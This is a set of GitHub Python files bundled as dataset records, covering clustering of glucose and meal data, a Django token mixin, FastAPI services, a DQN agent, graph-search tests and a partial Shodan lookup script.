'YValue'])\n\n\n# In[219]:\n\n\nif pd.isnull(insulin2.iloc[0,0]):\n startTime = insulin2.index[0]\n endTime = startTime + pd.offsets.Minute(120)\n curr = pd.DataFrame()\n i = 0\n \n while ((endTime < insulin2.index[len(insulin2)-1]) & (i < 41434)):\n curr = insulin2[(insulin2.index >= startTime)]\n curr = curr[(curr.index < endTime)]\n hasMeal = False\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n hasMeal = True\n \n if (hasMeal == False):\n noMeal_Time2 = noMeal_Time2.append({'startTime': startTime, 'endTime': endTime}, ignore_index=True)\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n \n elif (hasMeal == True):\n mealNext = True\n while ((mealNext == True) & (endTime < insulin2.index[len(insulin2)-1])):\n mealNext = False\n for j in range(len(curr)):\n if ((pd.notnull(curr.iloc[j,0])) and (curr.iloc[j,0] != 0)):\n startTime = curr.index[j]\n startMThirty = startTime - pd.offsets.Minute(30)\n endTime = startTime + pd.offsets.Minute(120)\n y_Val2 = curr.iloc[j,0]\n curr = insulin2[(insulin2.index > startTime)]\n curr = curr[(curr.index < endTime)]\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n mealNext = True\n #meal_Time2 = meal_Time2.append({'startTime': startMThirty, 'endTime': endTime}, ignore_index=True)\n yValue2 = yValue2.append({'startTime': startMThirty, 'endTime': endTime, 'YValue': y_Val2}, ignore_index=True)\n\n i = i + 1\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n\n\n# In[220]:\n\n\n\nmeal_Sensor = pd.DataFrame()\nnoMeal_Sensor = pd.DataFrame()\n\n\n# In[221]:\n\n\ny_val = []\nfor i in range(0, yValue.index[len(yValue)-1]):\n startTime = yValue.iloc[i,0]\n endTime = yValue.iloc[i,1]\n yval = yValue.iloc[i,2]\n y_val.append(yval)\n \n curr = pd.DataFrame()\n curr = cgm[(cgm.index < endTime)]\n curr = curr[(curr.index >= startTime)]\n curr = curr.reset_index(drop=True)\n curr = curr.T\n meal_Sensor = pd.concat([meal_Sensor, curr], ignore_index=True)\n \nyval = pd.DataFrame()\nyval['31'] = y_val\n\n\n# In[222]:\n\n\nmeal_Sensor = pd.concat([meal_Sensor, yval], axis=1)\n\n\n# In[223]:\n\n\ny_val2 = []\n\nfor i in range(0, yValue2.index[len(meal_Time2)-1]):\n startTime = yValue2.iloc[i,0]\n endTime = yValue2.iloc[i,1]\n yval2 = yValue2.iloc[i,2]\n y_val2.append(yval2)\n \n curr = pd.DataFrame()\n curr = cgm2[(cgm2.index < endTime)]\n curr = curr[(curr.index >= startTime)]\n curr = curr.reset_index(drop=True)\n curr = curr.T\n meal_Sensor = pd.concat([meal_Sensor, curr], ignore_index=True)\n \n#print(meal_Sensor)\n \nyval2 = pd.DataFrame()\nyval2['31'] = y_val2 \n\n\n# In[224]:\n\n\n\nmeal_Sensor.append(yval2, ignore_index=True, sort=False)\nmeal_Sensor = meal_Sensor.dropna()\n\n\n# In[225]:\n\n\nmeal = meal_Sensor\nmeal.to_csv(\"meal_Data_COPY.csv\")\n\n\n# In[226]:\n\n\ndata_ = pd.read_csv('meal_Data_COPY.csv', sep=',' ,header=None)\n\nY = data_.iloc[:, [31]]\ndata = data_.drop(data_.index[31], axis=1)\nY = Y.iloc[1:]\n\n\n# In[227]:\n\n\nmealVector = pd.DataFrame()\n\n\n# In[228]:\n\n\n#get the max value of the cgm data\nmaxVal = data.max(axis=1)\n#get the min value of the cgm data\nminVal = data.min(axis=1)\n\n#create a feature vec of CGMmax - CGMmin\nfeatureVector_CGM_Meal = maxVal - minVal\n\nmealVector['F1'] = featureVector_CGM_Meal\n\n\n# In[229]:\n\n\nmaxValLoc = data.idxmax(axis=1)\n#feature vec of time for cgm max data\nfeatureVector_CGM_MaxTime_Meal = maxValLoc\nmealVector['F2'] = featureVector_CGM_MaxTime_Meal\n\n\n# In[230]:\n\n\n#tells the time in intervals of 5\ntimeVals = []\nfor x,y in featureVector_CGM_MaxTime_Meal.iteritems():\n mins = 5 + (5 * y)\n timeVals.append(mins)\n \ntimeVals = pd.DataFrame(timeVals)\n \n\n\n# In[231]:\n\n\n#calc velocity for meal\nvel = []\nfor index, row in maxVal.iteritems():\n for i, r in timeVals.iteritems():\n if index == i:\n velocity = (row/r)\n vel.append(velocity)\n \nfeatureVector_Meal_Vel = pd.DataFrame(vel)\nfeatureVector_Meal_Vel = featureVector_Meal_Vel.T\n\nmealVector['F3'] = featureVector_Meal_Vel\n\n\n# In[232]:\n\n\nmealVector['F4'] = Y\nfinal = pd.DataFrame()\n\n\n# In[233]:\n\n\nmax1 = mealVector['F4'].max()\n#print(max1)\n\nmin1 = mealVector['F4'].min()\n#print(min1)\n\n\n# In[234]:\n\n\n\nbins=[0, 20, 40, 60, 80, 100, 120, 140] # 200, 220]\n\nmealVector['bin'] = pd.cut(mealVector['F4'], bins=bins, labels=False)\nmealVectorVals = mealVector.values\n\n\n# In[235]:\n\n\nmealVector = mealVector.fillna(0)\n\n\n# In[254]:\n\n\nX = mealVector.iloc[:, [0,1,2]]\n\nN = X.shape[0]\ns = X\n\nfft = np.fft.fft(s)\nfreq = np.fft.fftfreq(len(s))\n\n#print(fft, freq)\n\nfreq = freq.reshape(-1,1)\n\n\nplt.ylabel(\"Amplitude\")\nplt.xlabel(\"Frequency [Hz]\")\nplt.plot(freq,fft)\nplt.show()\n\n\n# In[388]:\n\n\nbins = mealVector.iloc[:, [1, 2, 3]]\nbins = bins.to_numpy()\n\nbins = bins.tolist()\n\nkm = KMeans(\n n_clusters=6, init='random',\n n_init=10, max_iter=300, \n tol=1e-04, random_state=0\n)\n\ny_km = km.fit_predict(freq)\n#print(y_km)\n\ny_km2 = km.fit_predict(bins)\n#print(y_km2)\n\n\n# In[389]:\n\n\nplt.scatter(\n mealVectorVals[y_km == 0, 0], mealVectorVals[y_km == 0, 1],\n s=50, c='lightgreen',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 1, 0], mealVectorVals[y_km == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 2, 0], mealVectorVals[y_km == 2, 1],\n s=50, c='lightblue',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 3, 0], mealVectorVals[y_km == 3, 1],\n s=50, c='pink',\n marker='o', edgecolor='black',\n label='cluster 3'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 4, 0], mealVectorVals[y_km == 4, 1],\n s=50, c='green',\n marker='o', edgecolor='black',\n label='cluster 4'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 5, 0], mealVectorVals[y_km == 5, 1],\n s=50, c='blue',\n marker='o', edgecolor='black',\n label='cluster 5'\n)\n\n\n\n\n\n\n# In[390]:\n\n\nplt.scatter(\n mealVectorVals[y_km2 == 0, 0], mealVectorVals[y_km2 == 0, 1],\n s=50, c='lightgreen',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 1, 0], mealVectorVals[y_km2 == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 2, 0], mealVectorVals[y_km2 == 2, 1],\n s=50, c='lightblue',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 3, 0], mealVectorVals[y_km2 == 3, 1],\n s=50, c='pink',\n marker='o', edgecolor='black',\n label='cluster 3'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 4, 0], mealVectorVals[y_km2 == 4, 1],\n s=50, c='green',\n marker='o', edgecolor='black',\n label='cluster 4'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 5, 0], mealVectorVals[y_km2 == 5, 1],\n s=50, c='blue',\n marker='o', edgecolor='black',\n label='cluster 5'\n)\n\n\n# In[391]:\n\n\ndistortions = []\nfor i in range(1, 11):\n km = KMeans(\n n_clusters=i, init='random',\n n_init=10, max_iter=300,\n tol=1e-04, random_state=0\n )\n km.fit(freq)\n distortions.append(km.inertia_)\n \n\n# plot\nplt.plot(range(1, 11), distortions, marker='o')\nplt.xlabel('Number of clusters')\nplt.ylabel('SSE')\nplt.show()\n\n\n# In[405]:\n\n\n#DBSCAN\nscan = mealVector.iloc[:, [1, 2, 3]]\nscan = scan.to_numpy()\nscan = scan.tolist()\n#print(scan.to_numpy().tolist())\n\n\"\"\"\nN = scan.shape[0]\ns = X\n\nfft2 = np.fft.fft(s)\nfreq2 = np.fft.fftfreq(len(s))\n\n\nfreq2 = freq2.reshape(-1,1)\n\nprint(freq2)\n\"\"\"\nscaler = StandardScaler() \nX_scaled = scaler.fit_transform(scan) \n \n# Normalizing the data so that \n# the data approximately follows a Gaussian distribution \nX_normalized = normalize(X_scaled) \n \n# Converting the numpy array into a pandas DataFrame \nX_normalized = pd.DataFrame(X_normalized) \n\n#X_normalized.values\n\n\n# In[406]:\n\n\npca = PCA(n_components = 2) \nX_principal = pca.fit_transform(X_normalized) \nX_principal = pd.DataFrame(X_principal) \nX_principal.columns = ['P1', 'P2'] \n\ndb_default = DBSCAN(eps = 0.0375, min_samples = 3).fit(X_principal) \ny_db = db_default.fit_predict(X_principal)\n#print(y_db)\nlabels = db_default.labels_ \n#print(labels)\n\n\n# In[407]:\n\n\ncolors = {} \ncolors[0] = 'red'\ncolors[1] = 'green'\ncolors[2] = 'blue'\ncolors[3] = 'cyan'\ncolors[4] = 'purple'\ncolors[5] = 'tomato'\ncolors[6] = 'olive'\ncolors[7] = 'blueviolet'\ncolors[8] = 'lightgreen'\ncolors[9] = 'hotpink'\ncolors[10] = 'brown'\ncolors[11] = 'fuchsia'\ncolors[12] = 'gold'\ncolors[13] = 'orange'\ncolors[14] = 'teal'\ncolors[15] = 'deeppink'\ncolors[16] = 'silver'\ncolors[17] = 'thistle'\ncolors[18] = 'chocolate'\ncolors[19] = 'darkorange'\ncolors[20] = 'slateblue'\ncolors[21] = 'dodgerblue'\ncolors[22] = 'yellowgreen'\ncolors[23] = 'sandybrown'\ncolors[24] = 'azure'\ncolors[25] = 'springgreen'\ncolors[26] = 'indigo'\ncolors[27] = 'plum'\ncolors[28] = 'firebrick'\ncolors[29] = 'skyblue'\ncolors[30] = 'violet'\ncolors[31] = 'aquamarine'\ncolors[-1] = 'coral'\n \n# Building the colour vector for each data point \ncvec = [colors[label] for label in labels] \n\nplt.figure(figsize =(9, 9)) \nplt.scatter(X_principal['P1'], X_principal['P2'] , c = cvec) \n \nplt.show() \n \n\n\n# In[408]:\n\n\nplt.figure(figsize=(10,5))\nnn = NearestNeighbors(n_neighbors=5).fit(X_normalized)\ndistances, idx = nn.kneighbors(X_normalized)\ndistances = np.sort(distances, axis=0)\ndistances = distances[:,1]\n\nplt.plot(distances)\nplt.show()\n\n\n#Computing \"the Silhouette Score\"\nprint(\"Silhouette Coefficient: %0.3f\"\n % metrics.silhouette_score(X_principal, labels))\n\n\n\n# In[409]:\n\n\nkm.inertia_\nfinal['KMeans SSE'] = km.inertia_\n#print(final)\n\nsilhoutte = metrics.silhouette_score(X_principal, labels)\nfinal['DBScan Silhoette Score'] = silhoutte\n\n#***********************\nent = entropy(mealVector['bin'], base=2)\nfinal['Kmeans Entropy'] = ent \n\n\nent2 = entropy(mealVector['bin'], base=2)\nfinal['DBScan Entropy'] = ent2\n\n\n\n#***********************\ndef purity_score(y_true, y_pred):\n # compute contingency matrix (also called confusion matrix)\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)\n # return purity\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix) \n\npurity = purity_score(mealVector['bin'], km.labels_)\n#purity = purity_score(y_km, km.labels_)\npur= []\npur.append(purity)\nfinal['Kmeans Purity'] = pur\n\npurity2 = purity_score(mealVector['bin'], db_default.labels_)\npur2 = []\npur2.append(purity2)\nfinal['DBScan Purity'] = pur2\n\n\n# In[410]:\n\n\nrows = [final]\nfile = pd.concat(rows, axis=0)\nfile.to_csv(\"Miller_Assignment03_Results.csv\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jmiller118/Data-Mining","sub_path":"Assignment03/Miller_Assignment03.py","file_name":"Miller_Assignment03.py","file_ext":"py","file_size_in_byte":15620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41070590517","text":"import secrets\n\nfrom django.conf import settings\nfrom django.db import models\n\nfrom .. import constants\n\n__all__ = [\n \"TokenMixin\"\n]\n\nTOKEN_MAX_LENGTH = getattr(settings, \"TOKEN_MAX_LENGTH\", constants.DEFAULT_TOKEN_MAX_LENGTH)\nTOKEN_CHARS = getattr(settings, \"TOKEN_CHARS\", constants.DEFAULT_TOKEN_CHARS)\nCREATE_ON_CREATION = getattr(\n settings, \"TOKEN_CREATE_ON_CREATION\", constants.TOKEN_CREATE_ON_CREATION\n)\n\n\nclass TokenMixin(models.Model):\n \"\"\"Create a `token` field with the ability to change it.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n abstract = True\n\n TOKEN_LENGTH = TOKEN_MAX_LENGTH\n TOKEN_CHARS = TOKEN_CHARS\n CREATE_ON_CREATION = CREATE_ON_CREATION\n\n token = models.CharField(\n max_length=TOKEN_MAX_LENGTH\n )\n\n @classmethod\n def _generate_token(cls) -> str:\n \"\"\"Generate a token and return it.\n\n This function just generates a token.\n \"\"\"\n assert cls.TOKEN_LENGTH <= TOKEN_MAX_LENGTH, \\\n f\"`TOKEN_LENGTH` can be at most `{TOKEN_MAX_LENGTH}`\"\n\n return \"\".join(\n secrets.choice(cls.TOKEN_CHARS)\n for _ in range(cls.TOKEN_LENGTH)\n )\n\n def _create_token(self):\n \"\"\"Generate a new token and set it.\"\"\"\n self.token = self._generate_token()\n\n def recreate_token(self):\n \"\"\"Recreates the token and saves it.\"\"\"\n self._create_token()\n self.save()\n\n def save(self, *args, **kwargs):\n \"\"\"Create a token if necessary and allowed.\"\"\"\n if self.token == \"\" and self.CREATE_ON_CREATION:\n self._create_token()\n\n return super().save(*args, **kwargs)\n","repo_name":"Myzel394/django-model-mixins","sub_path":"django_model_mixins/mixins/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38598343218","text":"from graphene import Schema\nfrom fastapi import FastAPI\nfrom starlette_graphene3 import *\nfrom app.db.database import prepare_database, Session\nfrom app.gql.querys import Query\nfrom app.db.models import Employer, Job, JobApplication\nfrom app.gql.mutations import Mutation\n\n\nschema = Schema(query=Query, mutation=Mutation)\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\ndef startup_event():\n prepare_database()\n\n\n@app.get(\"/employers\")\ndef get_employers():\n with Session() as session:\n return session.query(Employer).all()\n\n\n@app.get(\"/apps\")\ndef get_applications():\n with Session() as session:\n return session.query(JobApplication).count()\n\n\n@app.get(\"/jobs\")\ndef get_jobs():\n with Session() as session:\n return session.query(Job).all()\n\n\napp.mount(\"/\", GraphQLApp(\n schema=schema,\n on_get=make_playground_handler()\n))\n","repo_name":"AgustinRomeo/glq-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13888541261","text":"import os\nimport torch\nimport logging\nimport numpy as np\nimport torch.nn.functional as F\n\nclass DQN:\n\n def __init__(self,\n network,\n gamma,\n network_lr,\n device):\n\n self.type = \"value\"\n self.network = network.to(device)\n self.device = device\n self.gamma = gamma\n\n self.network_optimiser = torch.optim.Adam(self.network.parameters(), lr=network_lr)\n\n def select_action_from_policy(self, state):\n self.network.eval()\n with torch.no_grad():\n state_tensor = torch.FloatTensor(state).to(self.device)\n state_tensor = state_tensor.unsqueeze(0)\n q_values = self.network(state_tensor)\n action = torch.argmax(q_values).item()\n self.network.train()\n return action\n\n def train_policy(self, experiences):\n states, actions, rewards, next_states, dones = experiences\n info = {}\n\n # Convert into tensor\n states = torch.FloatTensor(np.asarray(states)).to(self.device)\n actions = torch.LongTensor(np.asarray(actions)).to(self.device)\n rewards = torch.FloatTensor(np.asarray(rewards)).to(self.device)\n next_states = torch.FloatTensor(np.asarray(next_states)).to(self.device)\n dones = torch.LongTensor(np.asarray(dones)).to(self.device)\n\n # Generate Q Values given state at time t and t + 1\n q_values = self.network(states)\n next_q_values = self.network(next_states)\n\n best_q_values = q_values[torch.arange(q_values.size(0)), actions]\n best_next_q_values = torch.max(next_q_values, dim=1).values\n\n q_target = rewards + self.gamma * (1 - dones) * best_next_q_values\n\n # Update the Network\n loss = F.mse_loss(best_q_values, q_target)\n self.network_optimiser.zero_grad()\n loss.backward()\n self.network_optimiser.step()\n\n info['q_target'] = q_target\n info['q_values_min'] = best_q_values\n info['network_loss'] = loss\n \n return info\n\n def save_models(self, filename, filepath='models'):\n path = f\"{filepath}/models\" if filepath != 'models' else filepath\n dir_exists = os.path.exists(path)\n\n if not dir_exists:\n os.makedirs(path)\n\n torch.save(self.network.state_dict(), f'{path}/{filename}_network.pht')\n logging.info(\"models has been saved...\")\n\n def load_models(self, filepath, filename):\n path = f\"{filepath}/models\" if filepath != 'models' else filepath\n\n self.network.load_state_dict(torch.load(f'{path}/{filename}_network.pht'))\n logging.info(\"models has been loaded...\")\n","repo_name":"UoA-CARES/cares_reinforcement_learning","sub_path":"cares_reinforcement_learning/algorithm/value/DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70093230247","text":"\"\"\"!\nTests our graph search algorithms\n\"\"\"\nimport cProfile\nimport unittest\n\n# profiler related\nfrom pstats import Stats\n\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\n\n\nclass BaseGraphSearcherTests(unittest.TestCase):\n \"\"\"\"\"\"\n\n def setUp(self):\n self.verbose = False\n #\n # Alan Gibbons, Algorithmic graph theory 1985, p. 22, fig. 1.16\n # depth first undirected graph\n\n # nodes\n self.n1 = Node(\"n1\", data={})\n self.n2 = Node(\"n2\", data={})\n self.n3 = Node(\"n3\", data={})\n self.n4 = Node(\"n4\", data={})\n self.n5 = Node(\"n5\", data={})\n self.n6 = Node(\"n6\", data={})\n self.n7 = Node(\"n7\", data={})\n self.n8 = Node(\"n8\", data={})\n self.n9 = Node(\"n9\", data={})\n self.n10 = Node(\"n10\", data={})\n self.n11 = Node(\"n11\", data={})\n self.n12 = Node(\"n12\", data={})\n self.n13 = Node(\"n13\", data={})\n\n # edges\n self.e1u = Edge.undirected(\n \"n1n4\", start_node=self.n1, end_node=self.n4, data={}\n )\n self.e2u = Edge.undirected(\n \"n1n3\", start_node=self.n1, end_node=self.n3, data={}\n )\n self.e3u = Edge.undirected(\n \"n1n2\", start_node=self.n1, end_node=self.n2, data={}\n )\n self.e4u = Edge.undirected(\n \"n1n5\", start_node=self.n1, end_node=self.n5, data={}\n )\n self.e5u = Edge.undirected(\n \"n1n6\", start_node=self.n1, end_node=self.n6, data={}\n )\n self.e6u = Edge.undirected(\n \"n1n7\", start_node=self.n1, end_node=self.n7, data={}\n )\n self.e7u = Edge.undirected(\n \"n1n8\", start_node=self.n1, end_node=self.n8, data={}\n )\n self.e8u = Edge.undirected(\n \"n8n2\", start_node=self.n8, end_node=self.n2, data={}\n )\n self.e9u = Edge.undirected(\n \"n9n10\", start_node=self.n9, end_node=self.n10, data={}\n )\n self.e10u = Edge.undirected(\n \"n9n13\", start_node=self.n9, end_node=self.n13, data={}\n )\n self.e11u = Edge.undirected(\n \"n10n11\", start_node=self.n10, end_node=self.n11, data={}\n )\n self.e12u = Edge.undirected(\n \"n10n12\", start_node=self.n10, end_node=self.n12, data={}\n )\n self.ugraph = BaseGraph(\n \"ugraph\",\n nodes=set(\n [\n self.n1,\n self.n2,\n self.n3,\n self.n4,\n self.n5,\n self.n6,\n self.n7,\n self.n8,\n self.n9,\n self.n10,\n self.n11,\n self.n12,\n self.n13,\n ]\n ),\n edges=set(\n [\n self.e1u,\n self.e2u,\n self.e3u,\n self.e4u,\n self.e5u,\n self.e6u,\n self.e7u,\n self.e8u,\n self.e9u,\n self.e10u,\n self.e11u,\n self.e12u,\n ]\n ),\n data={},\n )\n\n # tree\n self.a = Node(\"a\")\n self.b = Node(\"b\")\n self.c = Node(\"c\")\n self.d = Node(\"d\")\n self.e = Node(\"e\")\n self.f = Node(\"f\")\n self.g = Node(\"g\")\n self.h = Node(\"h\")\n self.j = Node(\"j\")\n self.k = Node(\"k\")\n self.m = Node(\"m\")\n #\n # +--a --+\n # | |\n # b c\n # | \\\n # +--+--+ g\n # | | | |\n # d e f h -- j\n # |\n # +--+---+\n # | |\n # k m\n #\n #\n self.ab = Edge(edge_id=\"ab\", start_node=self.a, end_node=self.b)\n self.ac = Edge(edge_id=\"ac\", start_node=self.a, end_node=self.c)\n self.bd = Edge(edge_id=\"bd\", start_node=self.b, end_node=self.d)\n self.be = Edge(edge_id=\"be\", start_node=self.b, end_node=self.e)\n self.bf = Edge(edge_id=\"bf\", start_node=self.b, end_node=self.f)\n self.fk = Edge(edge_id=\"fk\", start_node=self.f, end_node=self.k)\n self.fm = Edge(edge_id=\"fm\", start_node=self.f, end_node=self.m)\n self.cg = Edge(edge_id=\"cg\", start_node=self.c, end_node=self.g)\n self.gh = Edge(edge_id=\"gh\", start_node=self.g, end_node=self.h)\n self.hj = Edge(edge_id=\"hj\", start_node=self.h, end_node=self.j)\n self.gtree = BaseGraph.from_edgeset(\n edges=set(\n [\n self.ab,\n self.ac,\n self.bd,\n self.be,\n self.bf,\n self.fk,\n self.fm,\n self.cg,\n self.gh,\n self.hj,\n ]\n ),\n )\n\n # initialize profiler\n self.prof = cProfile.Profile()\n self.prof.enable()\n # print(\"\\n<<<<--------\")\n\n def tearDown(self):\n \"\"\" \"\"\"\n p = Stats(self.prof)\n p.sort_stats(\"cumtime\")\n if self.verbose is True:\n p.dump_stats(\"profiles/test_graphsearcher.py.prof\")\n p.print_stats()\n p.strip_dirs()\n # p.print_stats()\n # print(\"\\n--------->>>\")\n\n def test_id(self):\n return self.assertEqual(self.ugraph.id(), \"ugraph\")\n\n @unittest.skip(\"Implementation is not finished yet\")\n def test_depth_first_search(self):\n \"\"\n\n def egen(node):\n return BaseGraphOps.edges_of(self.ugraph, node)\n\n result = BaseGraphSearcher.depth_first_search(\n g=self.ugraph, edge_generator=egen\n )\n self.assertEqual(2, result[\"nb-component\"])\n # test leaves\n preds = result[\"dfs-trees\"]\n comps = []\n for root, c in preds.items():\n cd = {}\n for key, val in c.items():\n if val is not None:\n cd[key] = val\n comps.append(cd)\n # print(comps)\n first = comps.pop(0)\n\n def test_uniform_cost_search(self):\n \"\"\"\"\"\"\n start_node = self.b\n goal_node = self.m\n problem_set = self.gtree.E\n elist, solution = BaseGraphSearcher.uniform_cost_search(\n g=self.gtree, goal=goal_node, start=start_node, problem_set=problem_set\n )\n edges = [solution[\"edge\"]]\n while solution[\"parent\"] is not None:\n solution = solution[\"parent\"]\n edges.append(solution[\"edge\"])\n edges.pop() # last element edge is None\n self.assertEqual(list(reversed(edges)), [self.bf, self.fm])\n","repo_name":"D-K-E/graphical-models","sub_path":"test/test_graphsearcher.py","file_name":"test_graphsearcher.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2762160572","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Importando Bibliotecas\n\n# In[17]:\n\n\nimport pandas as pd\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\n\n# #### Criando agrupamentos\n\n# In[5]:\n\n\ndados = pd.read_csv('dados/aluguel_residencial.csv', sep = ';')\ndados\n\n\n# In[6]:\n\n\ndados['Valor'].mean()\n\n\n# In[7]:\n\n\nbairros = ['Barra da Tijuca', 'Copacabana', 'Ipanema', 'Leblon', 'Botafogo', 'Flamengo', 'Tijuca'] #abri um dataframe para fazer a media de acordo com os bairros\nselecao = dados['Bairro'].isin(bairros)\ndados = dados[selecao]\n\n\n# In[9]:\n\n\ndados['Bairro'].drop_duplicates() #ok todos os bairros unidos\n\n\n# In[11]:\n\n\ngrupo_bairro = dados.groupby('Bairro')\ngrupo_bairro\n\n\n# In[14]:\n\n\ngrupo_bairro[['Valor', 'Condominio']].mean().round(2) #media dos bairros, condominios e valores\n\n\n# ### Estatísticas descritivas\n\n# In[16]:\n\n\ngrupo_bairro['Valor'].describe().round(2) #algumas metricas interessantes \n\n\n# In[19]:\n\n\nplt.rc('figure', figsize = (20,10))\nfig = grupo_bairro['Valor'].std().plot.bar(color = 'blue')\n\n\n# In[20]:\n\n\nfig = grupo_bairro['Valor'].mean().plot.bar(color = 'blue')\nfig.set_ylabel('Valor do Aluguel')\nfig.set_title('Valor Médio do Aluguel por Bairro', {'fontsize': 22})\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"PatriciaSousas/Python-Pandas-Tratamento-e-analise-de-dados","sub_path":"Relatórios de Análise VII.py","file_name":"Relatórios de Análise VII.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11897752915","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom fastapi_utils.tasks import repeat_every\n\nfrom lib.garage_doors import trigger_right_garage_door, trigger_left_garage_door\nfrom lib.camera import detect_cars\n\napp = FastAPI()\n\n\n@app.get(\"/alive\")\nasync def _alive():\n return \"Hi\"\n\n\n@app.get(\"/door/right\", status_code=200)\nasync def _trigger_door():\n trigger_right_garage_door()\n return \"Right door triggered\"\n\n\n@app.get(\"/door/left\", status_code=200)\nasync def _trigger_door():\n trigger_left_garage_door()\n return \"Left door triggered\"\n\n\n@app.get(\"/camera/capture\", status_code=200)\n@app.on_event(\"startup\")\n@repeat_every(seconds=2)\nasync def _capture_image():\n detect_cars()\n return \"Captured new image\"\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"app:app\", port=5000, host=\"0.0.0.0\")\n","repo_name":"jantoreh/garagepi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"324611646","text":"from lib import FreqTableSimple\n\ntabla1 = FreqTableSimple([\n 'A', 'A', 'A', 'B', 'B',\n 'B', 'B', 'B', 'B', 'C'\n])\ntabla2 = FreqTableSimple({\n 'A':3, 'B':6, 'C':1\n})\ntabla3 = FreqTableSimple(\n 'A', 'A', 'A', 'B', 'B',\n 'B', 'B', 'B', 'B', 'C'\n)\ntabla4 = FreqTableSimple(\n A = 3, B = 6, C = 1\n)\n\nprint(tabla1)","repo_name":"xeland314/freqtables","sub_path":"examples/example0.py","file_name":"example0.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"tr","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3218500195","text":"import initial_etl.character_etl as character_etl\nimport initial_etl.weapon_etl as weapon_etl\nimport initial_etl.artifact_etl as artifact_etl\n\nclass Updater:\n \"\"\" Class to update/ETL all objects \"\"\"\n def __init__(self,char_url,weapon_urls,artifact_url):\n self._char_url = char_url\n self._weapon_urls = weapon_urls\n self._artifact_url = artifact_url\n \n def update(self):\n #Updates data on characters\n char_updater = character_etl.CharacterETL(self._char_url)\n char_updater.etl_data()\n\n #Updates data on weapons\n for weapon in self._weapon_urls:\n weapon_updater = weapon_etl.WeaponETL(self._weapon_urls[weapon], weapon)\n weapon_updater.etl_data()\n \n #Updates data on artifacts\n artifact_updater = artifact_etl.ArtifactETL(self._artifact_url)\n artifact_updater.etl_data()\n\n\n","repo_name":"blank519/genshin-char-builder","sub_path":"initial_etl/update_objects.py","file_name":"update_objects.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21645094454","text":"\n\nimport shodan\n\na = shodan.Shodan(\"Your API Key\")\nwhile True:\n print(\n \"\"\"\n 1. get your ip\n 2. Shodan Search to scan IPs, Hostnames, ports\n 3. Scanning a specific Host\n 0. quit\n \"\"\"\n )\n x = int(input(\"your option : \"))\n if x == 2:\n s = input(\"what would you like to search ? \")\n results = a.search(s)\n for result in results['matches']:\n print( result[\"ip_str\"],\"\\t\",end = '')\n print(str(result[\"port\"]),\"\\t\",end = '')\n print( result[\"org\"],\"\\t\",end = '')\n print(result[\"location\"][\"country_name\"],\"\\t\",end = '')\n print()\n print()\n if x == 3:\n k = input(\"enter an ip addrs : \")\n ipinfo = a.host(k)\n print(\"host name:\",\" \"*8,ipinfo['hostnames'],\"\\n\",\n 